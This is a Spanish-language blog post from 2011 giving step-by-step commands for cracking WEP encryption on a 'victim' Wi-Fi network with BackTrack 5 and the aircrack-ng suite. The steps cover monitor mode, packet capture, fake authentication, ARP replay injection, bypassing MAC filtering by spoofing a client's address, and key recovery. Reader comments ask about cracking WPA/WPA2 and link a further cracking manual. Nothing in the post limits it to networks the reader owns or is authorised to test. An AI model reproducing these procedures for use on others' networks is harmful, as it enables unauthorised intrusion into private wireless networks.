jueves, 26 de mayo de 2011

CRACKEO DE ENCRIPTACION WEP CON BACKTRACK 5 REVOLUTION


CRACKEO DE ENCRIPTACION WEP CON BACKTRACK 5 REVOLUTION
Abrimos una Terminal (consola 1):
1.    Configurar la secuencia de Arranque de la PC (USB o Lectora como primer dispositivo de arranque), donde este el BackTrack.
2.    Escribimos el comando startx para cargar el Entorno Grafico
3.    Ponemos la tarjeta en modo monitor con airmon-ng
airmon-ng start [nombre tarjeta inalámbrica]   --> wlan0, wlan1, ath0,.
Ejemplo: airmon-ng start wlan0
En modo monitor, la tarjeta quedara renombrada como: mon0 o mon1
4.    Escaneamos las redes wireless con airodump-ng
airodump-ng [nombre tarjeta inalámbrica]      --> mon0, mon1…..
Ejemplo: airodump-ng mon0
Verificamos el canal (CH) en el que está trabajando la red al cual atacaremos.
5.    Presionamos Ctrl + c para detener el escaneo.
6.    Escaneamos las la red seleccionada en un canal especifico y guardamos la captura en un archivo con airodump-ng
airodump-ng -c [numero canal] –w [nombre archivo]  [nombre tarjeta wifi]
Ejemplo: airodump-ng –c 6 –w wep mon0
Caso 1: Red sin Filtro de MAC:
Abrimos otra Terminal (consola 2):
1.    Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo: aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0
2.    Empezamos a inyectar paquetes a la red asociada con aireplay-ng
aireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo: aireplay-ng -3 –b 11:22:33:44:55:66 mon0
Caso 2: Red con Filtro de MAC:
Abrimos otra Terminal (consola 2):
1.    Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] –h [MAC cliente Victima]  [nombre tarjeta wifi]
Ejemplo: aireplay-ng -1 0 –a 11:22:33:44:55:66 -h 66:55:44:33:22:11 mon0
2.    Empezamos a inyectar paquetes a la red asociada con aireplay-ng
aireplay-ng -3 -b [MAC AP Victima] –h [MAC cliente Victima]  [nombre tarjeta wifi]
Ejemplo: aireplay-ng -3 –b 11:22:33:44:55:66 -h 66:55:44:33:22:11 mon0
Abrimos otra Terminal (consola 3):
1.    Una vez capturado una gran cantidad de datos (Data) vamos a crackear la red inalámbrica con aircrack-ng
aircrack-ng [filename]-01.cap
Ejemplo: aircrack-ng wep-01.cap

Nota: Para reiniciar la PC escribimos el comando init 6 en una terminal.

Descargar manual

5 comentarios:

  1. podrias decir como hackear o crackear claves wepa, wepa2 con el blacktrack 5

    ResponderEliminar
  2. ingreso todo bien...
    pero en la parte final...
    cuando trato de utilizar el archivo creado...
    me sale un aviso de que necesito utilizar o especificar un diccionario...
    como hago eso???... estoy utilizando backtrack 5 R2, gracias de antemano.

    ResponderEliminar
    Respuestas
    1. Te pide un diicionario, siempre y cuando tu realizas la auditoria a claves WPA, alli si es necesario el dicionario, pero en las encriptaciones WEP no se necesita del diccionario.

      Eliminar
  3. Hola!
    Aqui os dejo un manual completo sobre como crackear un punto de acceso(router) wifi

    Criptado y Crackeo Wep (método de aceleración: Airodump,Aireplay,Aircrack);Criptado y Crackeo WPA/WPA2 (método de aceleración :Aircrack,Genpmk,Cowpatty);Como descubrir un punto de acceso invisible (Hidden SSID);Como clonar una dirección MAC;Como evitar los filtros MAC;

    http://www.scribd.com/doc/128690264/Vulnerabilidades-WLAN-WEP-WPA-WPA2

    ResponderEliminar